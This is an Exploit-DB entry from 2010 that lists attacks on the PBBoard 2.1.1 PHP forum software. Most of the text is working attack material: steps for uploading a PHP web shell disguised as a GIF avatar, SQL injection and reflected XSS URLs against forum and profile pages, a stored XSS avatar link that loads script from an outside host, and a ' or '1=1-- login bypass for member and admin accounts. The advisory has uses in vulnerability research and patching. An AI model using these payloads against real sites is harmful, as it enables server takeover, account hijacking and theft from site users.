pbboard 2.1.1 - Multiple Vulnerabilities

EDB-ID:

15121

CVE:



Author:

JIKO

Type:

webapps


Platform:

PHP

Date:

2010-09-27


==================================================
PBBoard 2.1.1 Multiple Remote Vulnerabilities
==================================================

  |=-----------------------------------------------------=|
  |=-------------=[  JIKO |No-exploit.Com|  ]=-----------=|
  |=-----------------------------------------------------=|
[~]-----------|00|
NAme    :JIKO (JAWAD)
Home    :No-exploit.Com
Mail    : !x!
[~]-----------|01|
    -{Script}
    name :PBBoard_v2.1.1
    link :http://www.pbboard.com/PBBoard_v2.1.1.zip
 
[~]-----------|02|
    -{3xpl01t}
    
    upload Shell and file .exe ....etc :(
    http://localhost/ara/index.php?page=usercp&control=1&avatar=1&main=1
    select From my Pc
    and upload your Shell php with GIF89a; you can see the size of img is long use a programme for inser php code in img
    
    sql & xss
    all script is infected :(
    inser '( in all % variable in the script
    SQl :/index.php?page=forum&show=1&id=2'a
    Xss :/index.php?page=forum&show=1&id=2'a<br>hello <script>alert(123)</script>
    
    SQl :/index.php?page=profile&show=1&username=jawad'
    SQl :/index.php?page=profile&show=1&username=jawad' and id='1
    Xss :/index.php?page=profile&show=1&username=jawad'a<br>hello <script>alert(123)</script>
    ........etc
    
    Xss In Profil
    
    Url :/index.php?page=usercp&control=1&avatar=1&main=1
    Select img From Url
    http://"><SCRIPT/XSS SRC="http://no-exploit/xss.js"></SCRIPT>.gif
    
    Login :(
    
    User : real name of admin or member you want | jawad' or '1=1--
    Pass : jiko
    
    for admin panel
    
    Url  : /admin.php
    User : jawad' or '1=1--
    Pass : jiko
    :((..Etc exploit
    
    
[~]-----------|03|
    -{Greetz}
    All my friends
    |No-Exploit.com Members
-------------------------------------